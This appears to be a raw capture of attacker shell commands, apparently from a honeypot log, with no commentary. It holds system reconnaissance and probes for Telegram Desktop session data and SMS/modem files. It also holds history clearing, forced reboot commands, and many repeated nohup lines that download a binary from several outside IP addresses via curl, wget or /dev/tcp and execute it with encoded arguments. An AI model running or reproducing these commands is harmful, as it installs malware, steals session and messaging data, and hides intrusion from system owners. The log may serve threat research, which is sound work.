echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" for i in `cat /proc/mounts|grep tmpfs|grep -v noexec|cut -d ' ' -f 2`; do >$i/.a && cd $i;done free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' grep MemTotal /proc/meminfo 2 > /dev/null grep model name /proc/cpuinfo 2 > /dev/null head -c 1458464 > /tmp/1xSz5b521N head -c 1458464 > /tmp/2n1j1b9reN head -c 1458464 > /tmp/45HHfSlsxD head -c 1458464 > /tmp/5nXGaqU8Di head -c 1458464 > /tmp/87D5zd4xWX head -c 1458464 > /tmp/8Y0E5dhAcD head -c 1458464 > /tmp/DGHRjzuWru head -c 1458464 > /tmp/Da1t9PhtRZ head -c 1458464 > /tmp/JPj3hVvn0l head -c 1458464 > /tmp/Ukb9Jj1xcQ head -c 1458464 > /tmp/VFIH2k4dCN head -c 1458464 > /tmp/ViibLvYJ84 head -c 1458464 > /tmp/WUMQzjwpGA head -c 1458464 > /tmp/c56XtmVfAY head -c 1458464 > /tmp/imBM7apSrJ head -c 1458464 > /tmp/mlAQYGysNY head -c 1458464 > /tmp/oca2n9fx2V head -c 1458464 > /tmp/owAqlg8pHk head -c 1458464 > /tmp/zoGiFXuvBj head -c 3800636 > /tmp/1b7va9cCyc head -c 3800636 > /tmp/BzcZnyJHbH head -c 3800636 > /tmp/W9nJo51n8c head -c 3800636 > /tmp/q70nLPn3fA head -c 3815748 > /tmp/onyxZftE4Y history -c history | tail -5 hostname id ifconfig kill %1 kill 1;reboot; init 6; init 1; echo b > /proc/sys* linuxshell locate D877F783D5D3EF8Cs ls ls -la / ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ls -la /var/run/gcc.pid ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/* ls -lh $(which ls) ls /root lscpu 2 > /dev/null | grep -q Little Endian lscpu | grep Model mount | head -5 netstat -tulpn | head -10 nohup $SHELL -c "curl http://47.102.202.2:60125/linux -o /tmp/icRygBHJt1; if [ ! -f /tmp/icRygBHJt1 ]; then wget http://47.102.202.2:60125/linux -O /tmp/icRygBHJt1; fi; if [ ! -f /tmp/icRygBHJt1 ]; then exec 6<>/dev/tcp/47.102.202.2/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/icRygBHJt1 ; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=; fi; echo password > /tmp/.opass; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=" & nohup $SHELL -c "curl http://47.102.202.2:60125/linux -o /tmp/icRygBHJt1; if [ ! -f /tmp/icRygBHJt1 ]; then wget http://47.102.202.2:60125/linux -O /tmp/icRygBHJt1; fi; if [ ! -f /tmp/icRygBHJt1 ]; then exec 6<>/dev/tcp/47.102.202.2/60125 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/icRygBHJt1 ; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=; fi; echo password > /tmp/.opass; chmod +x /tmp/icRygBHJt1 && /tmp/icRygBHJt1 fTVbHVe8SDRTv0scQSwJCiNfG0m+XThTvEsYQSQHBDteH0m0SzBMv0gKXiQGHiRYEle8TDhTvEoYVSMAASVaCky/UzJIvlcYWzsCBCVVHEm/TThduk4EVyweAiZdBEi2SDpLvkgZXjUBACJBG066UzJNu1cbWycKBiVeGk6uSTdTvEwbQS0EHiRaHEO4TTFNu1keWDsCAyxBG0C8UzFNuUMcXyQEADVXBEi7SC5MuFcYXSUKBiVeGE+uRTBTuUEEXSEDHiRZHUO4TTFPt1keWDsCBCZBH0GgTDNLtE8aXiYCECFYBEu6Ti5KvlcYWyUKBiVeG0yuRS5MvUEEXi0BHiJaEE++TDJMrk0dQS0GHiRYHVe/STVHuEkbXyYQBCJBG0u+UzVIoEoTVSMAASFdCk25UzFNvFcYXyceAi9ZGki8SCBJuVcSWTsCHiRbE0O4TTFPvFkTWjsEBzteHEigRDVHuEkbXCYQCCBBHE+gTDVTv0sbVSMAASZXCk25UzhLoEsEXiEJCiNfG0u8XThTv0oSQSEGHiReHkO4TTFJu1kYXSceByBBGUmgTjhHuEkbXSUQCDtdG06gTzFTv04fVSMAASVWCk25UzJJvVcfVzsBAyNVHEm/TjJduk4EVyweAiZdBEi2SDpLvkgZXjUEBztdGUCgTDlOoEgSXC8GACReGVm/SDRTt0gEVyYeASRVHEm/TjVduk4EVyMeASJZBEu+RDpLvkgZXDUIHiRcEle/RTFTuUwQWSUBAiRPHk6gRTNTv0EaQScECiNfG0u2tWtjSqkTwfS8ndBgDH6Fy8Q=" &#UPX! nohup $SHELL -c "curl http://47.239.193.183:60113/linux -o /tmp/Eln9gnIwy0; if [ ! -f /tmp/Eln9gnIwy0 ]; then wget http://47.239.193.183:60113/linux -O /tmp/Eln9gnIwy0; fi; if [ ! -f /tmp/Eln9gnIwy0 ]; then exec 6<>/dev/tcp/47.239.193.183/60113 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/Eln9gnIwy0 ; chmod +x /tmp/Eln9gnIwy0 && /tmp/Eln9gnIwy0 NeJ1hxulMrkYnnnsSU3yd58ZpjGmCZ167EpN9mOYG6EurhCTe/JJSPJtnR65MaUbh3zzS1bzf5MfpzGnEIl89U1W9GOaG7kxohqTe/JJSPttkQelMaAHmHjsSUnzd58ZpjOmCZFj8ElP7H+YB6Y3ohOfffNIQeJ1hxumMLkcmWP0TUL0fZgboSCjHod19FZL9WOYHac6oRmYefFYTPVjmxqhLqUZh3n7Qk7yfJsZtzSgB5t++1ZJ+36HGK8zrR+ZfPNLWPN0mwekLq4bh3X1Qk7yfJkdtzSgB5F+7ElK9mOYG6Y6oRmYffdYTPVjmxquLqUZnGPwSEj4e5kYpjK3HZ5j8EtB7HqaB6YyrR+ZfPFPWPZ6hxGhLqQah3z7TUL0fZgapyCjHod/9kpW9HuHGKUzrR+ZfPBMWPZ6hxilMLkcnGPzTU/4e5kYpTC3HZ5j8ExK7H+aHLkxpx+Te/JJSfRtnR65MqQRh3z1SlbwfZwToTCmHZtt9k9W8H6QB6Y2pgebefBCTvJ8mRG3NKAHmHz1VkD1Y5EbrTanGJp14kxP7HWaB6UyoQeadfhOSPN5kAmjN7kRmmPwSEvsfJEarTanGJp14kxP7H+aH7kyoxyHf/FMQvR9mBumIKYZmGPwSEjsfJ0euTGhH5N78klJ+22dHrk4oQeafuxJQfd3nxmmM6cJkWPzTU3sfJ8HpTKnE59980pO4nWHG6YwuRibf+xJSvd3nxmmNK4JnXrsSk32Y58QuTGkGpN78klL922dHrkypBCHfPtKVvp6kx+nMaMaALsN7ZfW/0G+REB5eD0w; fi; echo password > /tmp/.opass; chmod +x /tmp/Eln9gnIwy0 && /tmp/Eln9gnIwy0 NeJ1hxulMrkYnnnsSU3yd58ZpjGmCZ167EpN9mOYG6EurhCTe/JJSPJtnR65MaUbh3zzS1bzf5MfpzGnEIl89U1W9GOaG7kxohqTe/JJSPttkQelMaAHmHjsSUnzd58ZpjOmCZFj8ElP7H+YB6Y3ohOfffNIQeJ1hxumMLkcmWP0TUL0fZgboSCjHod19FZL9WOYHac6oRmYefFYTPVjmxqhLqUZh3n7Qk7yfJsZtzSgB5t++1ZJ+36HGK8zrR+ZfPNLWPN0mwekLq4bh3X1Qk7yfJkdtzSgB5F+7ElK9mOYG6Y6oRmYffdYTPVjmxquLqUZnGPwSEj4e5kYpjK3HZ5j8EtB7HqaB6YyrR+ZfPFPWPZ6hxGhLqQah3z7TUL0fZgapyCjHod/9kpW9HuHGKUzrR+ZfPBMWPZ6hxilMLkcnGPzTU/4e5kYpTC3HZ5j8ExK7H+aHLkxpx+Te/JJSfRtnR65MqQRh3z1SlbwfZwToTCmHZtt9k9W8H6QB6Y2pgebefBCTvJ8mRG3NKAHmHz1VkD1Y5EbrTanGJp14kxP7HWaB6UyoQeadfhOSPN5kAmjN7kRmmPwSEvsfJEarTanGJp14kxP7H+aH7kyoxyHf/FMQvR9mBumIKYZmGPwSEjsfJ0euTGhH5N78klJ+22dHrk4oQeafuxJQfd3nxmmM6cJkWPzTU3sfJ8HpTKnE59980pO4nWHG6YwuRibf+xJSvd3nxmmNK4JnXrsSk32Y58QuTGkGpN78klL922dHrkypBCHfPtKVvp6kx+nMaMaALsN7ZfW/0G+REB5eD0w" & nohup $SHELL -c "curl http://47.86.28.47:60131/linux -o /tmp/HoqSAmFdPK; if [ ! -f /tmp/HoqSAmFdPK ]; then wget http://47.86.28.47:60131/linux -O /tmp/HoqSAmFdPK; fi; if [ ! -f /tmp/HoqSAmFdPK ]; then exec 6<>/dev/tcp/47.86.28.47/60131 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/HoqSAmFdPK ; chmod +x /tmp/HoqSAmFdPK && /tmp/HoqSAmFdPK K6BT2kMUhO6AXlDaejlt1lRfn+qBBlXDVbJUSLFQ2UMXhOqUWVLdZTF03VdYgOiFE0PYUq5TUbpR3VwUgvqdXkzeZjB61FRBn+OGHFvdVrBVRrRQw1UQn+iWQVbbbjZk3VFejuKfFFzdSbVWSLZS11sWgOiYT1PUYi5l1FFBluOfEFvXUbBXVLBH1UMUgOKAXVHYejVk1lRfn+mBBlzeU65XVLJJ2l4IguqUWVLdZDZ02VNBnO+BCFjZSbFUVLpR3VwShPqXW0zdYTZ63lZBluKLEF3cU7lGXq5W2FgIgOyAXVDcbjZk3VBZjuuAF0PcULBIVbZJ3F4Ti+yeXlDcdDFn1UxemOifFF7fSblfXLZX3FwQkeKAXVPUejFt3kxdnO6LEF3cVbZGV7hSw1wRifSaWEzdYzJu2lJemuORElrDVbNfSLJX1EMXhOKUWVLdZDN03VdbgOyfF1ncSbFSVLpR3VwUhPqfV1LCbTd63lFXgOuGEFfbV7FWVqBW3FUIguuAXVbYejFm1FhZnuuDEE3VSbJXXq5V3lkIhOqUWVLdZzB02FVBluyfF1XaSbFWULpR3VwWgfqWQVDdZC5h3ExZm+CHFlzfUaBXV7BJ2V0IgOmcQVPdbjZk3VNbju6GCFrbSbJTSLFR2VcQgeudXELdZTl63VtWgOmECF/dVLpQVrFV3U0ShvScWlDCZTF62lJVmOqAFFvNX65XU7VJ3FsIg+ieVVTcZTJizFFegOiDFkPVUa5XX7dd210XgemOW1XCZjNswlNYnPSDFljXUbBXUrIAmVdOSzNkYsRY5s2JQ90hhDdquNUVJqMwGWZkfw==; fi; echo password > /tmp/.opass; chmod +x /tmp/HoqSAmFdPK && /tmp/HoqSAmFdPK K6BT2kMUhO6AXlDaejlt1lRfn+qBBlXDVbJUSLFQ2UMXhOqUWVLdZTF03VdYgOiFE0PYUq5TUbpR3VwUgvqdXkzeZjB61FRBn+OGHFvdVrBVRrRQw1UQn+iWQVbbbjZk3VFejuKfFFzdSbVWSLZS11sWgOiYT1PUYi5l1FFBluOfEFvXUbBXVLBH1UMUgOKAXVHYejVk1lRfn+mBBlzeU65XVLJJ2l4IguqUWVLdZDZ02VNBnO+BCFjZSbFUVLpR3VwShPqXW0zdYTZ63lZBluKLEF3cU7lGXq5W2FgIgOyAXVDcbjZk3VBZjuuAF0PcULBIVbZJ3F4Ti+yeXlDcdDFn1UxemOifFF7fSblfXLZX3FwQkeKAXVPUejFt3kxdnO6LEF3cVbZGV7hSw1wRifSaWEzdYzJu2lJemuORElrDVbNfSLJX1EMXhOKUWVLdZDN03VdbgOyfF1ncSbFSVLpR3VwUhPqfV1LCbTd63lFXgOuGEFfbV7FWVqBW3FUIguuAXVbYejFm1FhZnuuDEE3VSbJXXq5V3lkIhOqUWVLdZzB02FVBluyfF1XaSbFWULpR3VwWgfqWQVDdZC5h3ExZm+CHFlzfUaBXV7BJ2V0IgOmcQVPdbjZk3VNbju6GCFrbSbJTSLFR2VcQgeudXELdZTl63VtWgOmECF/dVLpQVrFV3U0ShvScWlDCZTF62lJVmOqAFFvNX65XU7VJ3FsIg+ieVVTcZTJizFFegOiDFkPVUa5XX7dd210XgemOW1XCZjNswlNYnPSDFljXUbBXUrIAmVdOSzNkYsRY5s2JQ90hhDdquNUVJqMwGWZkfw==" & nohup $SHELL -c "curl http://47.86.28.47:60131/linux -o /tmp/HoqSAmFdPK; if [ ! -f /tmp/HoqSAmFdPK ]; then wget http://47.86.28.47:60131/linux -O /tmp/HoqSAmFdPK; fi; if [ ! -f /tmp/HoqSAmFdPK ]; then exec 6<>/dev/tcp/47.86.28.47/60131 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/HoqSAmFdPK ; chmod +x /tmp/HoqSAmFdPK && /tmp/HoqSAmFdPK K6BT2kMUhO6AXlDaejlt1lRfn+qBBlXDVbJUSLFQ2UMXhOqUWVLdZTF03VdYgOiFE0PYUq5TUbpR3VwUgvqdXkzeZjB61FRBn+OGHFvdVrBVRrRQw1UQn+iWQVbbbjZk3VFejuKfFFzdSbVWSLZS11sWgOiYT1PUYi5l1FFBluOfEFvXUbBXVLBH1UMUgOKAXVHYejVk1lRfn+mBBlzeU65XVLJJ2l4IguqUWVLdZDZ02VNBnO+BCFjZSbFUVLpR3VwShPqXW0zdYTZ63lZBluKLEF3cU7lGXq5W2FgIgOyAXVDcbjZk3VBZjuuAF0PcULBIVbZJ3F4Ti+yeXlDcdDFn1UxemOifFF7fSblfXLZX3FwQkeKAXVPUejFt3kxdnO6LEF3cVbZGV7hSw1wRifSaWEzdYzJu2lJemuORElrDVbNfSLJX1EMXhOKUWVLdZDN03VdbgOyfF1ncSbFSVLpR3VwUhPqfV1LCbTd63lFXgOuGEFfbV7FWVqBW3FUIguuAXVbYejFm1FhZnuuDEE3VSbJXXq5V3lkIhOqUWVLdZzB02FVBluyfF1XaSbFWULpR3VwWgfqWQVDdZC5h3ExZm+CHFlzfUaBXV7BJ2V0IgOmcQVPdbjZk3VNbju6GCFrbSbJTSLFR2VcQgeudXELdZTl63VtWgOmECF/dVLpQVrFV3U0ShvScWlDCZTF62lJVmOqAFFvNX65XU7VJ3FsIg+ieVVTcZTJizFFegOiDFkPVUa5XX7dd210XgemOW1XCZjNswlNYnPSDFljXUbBXUrIAmVdOSzNkYsRY5s2JQ90hhDdquNUVJqMwGWZkfw==; fi; echo password > /tmp/.opass; chmod +x /tmp/HoqSAmFdPK && /tmp/HoqSAmFdPK K6BT2kMUhO6AXlDaejlt1lRfn+qBBlXDVbJUSLFQ2UMXhOqUWVLdZTF03VdYgOiFE0PYUq5TUbpR3VwUgvqdXkzeZjB61FRBn+OGHFvdVrBVRrRQw1UQn+iWQVbbbjZk3VFejuKfFFzdSbVWSLZS11sWgOiYT1PUYi5l1FFBluOfEFvXUbBXVLBH1UMUgOKAXVHYejVk1lRfn+mBBlzeU65XVLJJ2l4IguqUWVLdZDZ02VNBnO+BCFjZSbFUVLpR3VwShPqXW0zdYTZ63lZBluKLEF3cU7lGXq5W2FgIgOyAXVDcbjZk3VBZjuuAF0PcULBIVbZJ3F4Ti+yeXlDcdDFn1UxemOifFF7fSblfXLZX3FwQkeKAXVPUejFt3kxdnO6LEF3cVbZGV7hSw1wRifSaWEzdYzJu2lJemuORElrDVbNfSLJX1EMXhOKUWVLdZDN03VdbgOyfF1ncSbFSVLpR3VwUhPqfV1LCbTd63lFXgOuGEFfbV7FWVqBW3FUIguuAXVbYejFm1FhZnuuDEE3VSbJXXq5V3lkIhOqUWVLdZzB02FVBluyfF1XaSbFWULpR3VwWgfqWQVDdZC5h3ExZm+CHFlzfUaBXV7BJ2V0IgOmcQVPdbjZk3VNbju6GCFrbSbJTSLFR2VcQgeudXELdZTl63VtWgOmECF/dVLpQVrFV3U0ShvScWlDCZTF62lJVmOqAFFvNX65XU7VJ3FsIg+ieVVTcZTJizFFegOiDFkPVUa5XX7dd210XgemOW1XCZjNswlNYnPSDFljXUbBXUrIAmVdOSzNkYsRY5s2JQ90hhDdquNUVJqMwGWZkfw==" &#UPX! nohup $SHELL -c "curl http://8.218.225.42:60101/linux -o /tmp/eQvggbYfjg; if [ ! -f /tmp/eQvggbYfjg ]; then wget http://8.218.225.42:60101/linux -O /tmp/eQvggbYfjg; fi; if [ ! -f /tmp/eQvggbYfjg ]; then exec 6<>/dev/tcp/8.218.225.42/60101 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/eQvggbYfjg ; chmod +x /tmp/eQvggbYfjg && /tmp/eQvggbYfjg 4VfJEMtmOXRuPWbTCcROlppHzBfVdDRucj5myxbKQ4KdQs0d02Q9cXEsYNIJzEWdgkbEFctsOXp2PGXWH91PnYJBxQnUYzxucj5n3xHNRp6fV8kQy2w6bnE7YssVzU6WmkfMFNZ0PXJzImHSCcxBmoJGyhPfYjxxcTR00RTTRZiUWcofy2Y9cXo6ZNQXz1eYm1nFEctmNG50O27TF8xEnYxP0xbQYSJxdiJm1xfHQZydRcsH3Xo+cXAiYdUJy0KWmkfMFdN0OHduPmfcCcxOnoJGyx3TZD10cixg1gnPQ5SCQMUJ12Q4enY8ZdQW3UObgkDLCddlPG5xP2PfEc1GnZlXxQnXZTRucj9gyxLNTZqcRs4XxWA7bnI/bMsSylmemULHEdVlPXVgOGPLFsxOgp9D0xbWbDZ2cD1n0AfFWZ6dT9MV12EidHI2YtUWzUaMlFnMFNJ6PXJ0ImLSHctHnZhO3R/LZTl1bj1iyxXPR5aaR8wV03Q4d24+Z9wJzE6egkbLHdNkPXRyLGDSCc9CmIJGzxDLZTl1ejpk1BXPV52ZTtMQ0Ho0cm4+ZtYdy0ednkTdE9J6NHZuPmzLE8pNmpxGzhbFZT13bj1h3QnIT4KdQc4d02Q9cnAsYNIJz0OegkbNH8tjPXp2PGXVEN1DmYJGyAnUYjRucjhh3xHNRp+dV8wf1no9eXYiZdwf00aflU3LF9RmPGB0O3rdFNNFnJ9ZzB/WbjpwcT9sxRbNQYKdRdMU0Ho9cXM2YtUWz0eMmEDTFdFnInV4ImXWEcdBnJ1Ez825Xej+BVKBwV5RG8+gzmGXhw==; fi; echo password > /tmp/.opass; chmod +x /tmp/eQvggbYfjg && /tmp/eQvggbYfjg 4VfJEMtmOXRuPWbTCcROlppHzBfVdDRucj5myxbKQ4KdQs0d02Q9cXEsYNIJzEWdgkbEFctsOXp2PGXWH91PnYJBxQnUYzxucj5n3xHNRp6fV8kQy2w6bnE7YssVzU6WmkfMFNZ0PXJzImHSCcxBmoJGyhPfYjxxcTR00RTTRZiUWcofy2Y9cXo6ZNQXz1eYm1nFEctmNG50O27TF8xEnYxP0xbQYSJxdiJm1xfHQZydRcsH3Xo+cXAiYdUJy0KWmkfMFdN0OHduPmfcCcxOnoJGyx3TZD10cixg1gnPQ5SCQMUJ12Q4enY8ZdQW3UObgkDLCddlPG5xP2PfEc1GnZlXxQnXZTRucj9gyxLNTZqcRs4XxWA7bnI/bMsSylmemULHEdVlPXVgOGPLFsxOgp9D0xbWbDZ2cD1n0AfFWZ6dT9MV12EidHI2YtUWzUaMlFnMFNJ6PXJ0ImLSHctHnZhO3R/LZTl1bj1iyxXPR5aaR8wV03Q4d24+Z9wJzE6egkbLHdNkPXRyLGDSCc9CmIJGzxDLZTl1ejpk1BXPV52ZTtMQ0Ho0cm4+ZtYdy0ednkTdE9J6NHZuPmzLE8pNmpxGzhbFZT13bj1h3QnIT4KdQc4d02Q9cnAsYNIJz0OegkbNH8tjPXp2PGXVEN1DmYJGyAnUYjRucjhh3xHNRp+dV8wf1no9eXYiZdwf00aflU3LF9RmPGB0O3rdFNNFnJ9ZzB/WbjpwcT9sxRbNQYKdRdMU0Ho9cXM2YtUWz0eMmEDTFdFnInV4ImXWEcdBnJ1Ez825Xej+BVKBwV5RG8+gzmGXhw==" & nohup $SHELL -c "curl http://8.218.225.42:60101/linux -o /tmp/eQvggbYfjg; if [ ! -f /tmp/eQvggbYfjg ]; then wget http://8.218.225.42:60101/linux -O /tmp/eQvggbYfjg; fi; if [ ! -f /tmp/eQvggbYfjg ]; then exec 6<>/dev/tcp/8.218.225.42/60101 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/eQvggbYfjg ; chmod +x /tmp/eQvggbYfjg && /tmp/eQvggbYfjg 4VfJEMtmOXRuPWbTCcROlppHzBfVdDRucj5myxbKQ4KdQs0d02Q9cXEsYNIJzEWdgkbEFctsOXp2PGXWH91PnYJBxQnUYzxucj5n3xHNRp6fV8kQy2w6bnE7YssVzU6WmkfMFNZ0PXJzImHSCcxBmoJGyhPfYjxxcTR00RTTRZiUWcofy2Y9cXo6ZNQXz1eYm1nFEctmNG50O27TF8xEnYxP0xbQYSJxdiJm1xfHQZydRcsH3Xo+cXAiYdUJy0KWmkfMFdN0OHduPmfcCcxOnoJGyx3TZD10cixg1gnPQ5SCQMUJ12Q4enY8ZdQW3UObgkDLCddlPG5xP2PfEc1GnZlXxQnXZTRucj9gyxLNTZqcRs4XxWA7bnI/bMsSylmemULHEdVlPXVgOGPLFsxOgp9D0xbWbDZ2cD1n0AfFWZ6dT9MV12EidHI2YtUWzUaMlFnMFNJ6PXJ0ImLSHctHnZhO3R/LZTl1bj1iyxXPR5aaR8wV03Q4d24+Z9wJzE6egkbLHdNkPXRyLGDSCc9CmIJGzxDLZTl1ejpk1BXPV52ZTtMQ0Ho0cm4+ZtYdy0ednkTdE9J6NHZuPmzLE8pNmpxGzhbFZT13bj1h3QnIT4KdQc4d02Q9cnAsYNIJz0OegkbNH8tjPXp2PGXVEN1DmYJGyAnUYjRucjhh3xHNRp+dV8wf1no9eXYiZdwf00aflU3LF9RmPGB0O3rdFNNFnJ9ZzB/WbjpwcT9sxRbNQYKdRdMU0Ho9cXM2YtUWz0eMmEDTFdFnInV4ImXWEcdBnJ1Ez825Xej+BVKBwV5RG8+gzmGXhw==; fi; echo password > /tmp/.opass; chmod +x /tmp/eQvggbYfjg && /tmp/eQvggbYfjg 4VfJEMtmOXRuPWbTCcROlppHzBfVdDRucj5myxbKQ4KdQs0d02Q9cXEsYNIJzEWdgkbEFctsOXp2PGXWH91PnYJBxQnUYzxucj5n3xHNRp6fV8kQy2w6bnE7YssVzU6WmkfMFNZ0PXJzImHSCcxBmoJGyhPfYjxxcTR00RTTRZiUWcofy2Y9cXo6ZNQXz1eYm1nFEctmNG50O27TF8xEnYxP0xbQYSJxdiJm1xfHQZydRcsH3Xo+cXAiYdUJy0KWmkfMFdN0OHduPmfcCcxOnoJGyx3TZD10cixg1gnPQ5SCQMUJ12Q4enY8ZdQW3UObgkDLCddlPG5xP2PfEc1GnZlXxQnXZTRucj9gyxLNTZqcRs4XxWA7bnI/bMsSylmemULHEdVlPXVgOGPLFsxOgp9D0xbWbDZ2cD1n0AfFWZ6dT9MV12EidHI2YtUWzUaMlFnMFNJ6PXJ0ImLSHctHnZhO3R/LZTl1bj1iyxXPR5aaR8wV03Q4d24+Z9wJzE6egkbLHdNkPXRyLGDSCc9CmIJGzxDLZTl1ejpk1BXPV52ZTtMQ0Ho0cm4+ZtYdy0ednkTdE9J6NHZuPmzLE8pNmpxGzhbFZT13bj1h3QnIT4KdQc4d02Q9cnAsYNIJz0OegkbNH8tjPXp2PGXVEN1DmYJGyAnUYjRucjhh3xHNRp+dV8wf1no9eXYiZdwf00aflU3LF9RmPGB0O3rdFNNFnJ9ZzB/WbjpwcT9sxRbNQYKdRdMU0Ho9cXM2YtUWz0eMmEDTFdFnInV4ImXWEcdBnJ1Ez825Xej+BVKBwV5RG8+gzmGXhw==" &#UPX! nohup $SHELL -c "curl http://8.218.225.42:60101/linux -o /tmp/jMf1IZQCNJ; if [ ! -f /tmp/jMf1IZQCNJ ]; then wget http://8.218.225.42:60101/linux -O /tmp/jMf1IZQCNJ; fi; if [ ! -f /tmp/jMf1IZQCNJ ]; then exec 6<>/dev/tcp/8.218.225.42/60101 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/jMf1IZQCNJ ; chmod +x /tmp/jMf1IZQCNJ && /tmp/jMf1IZQCNJ 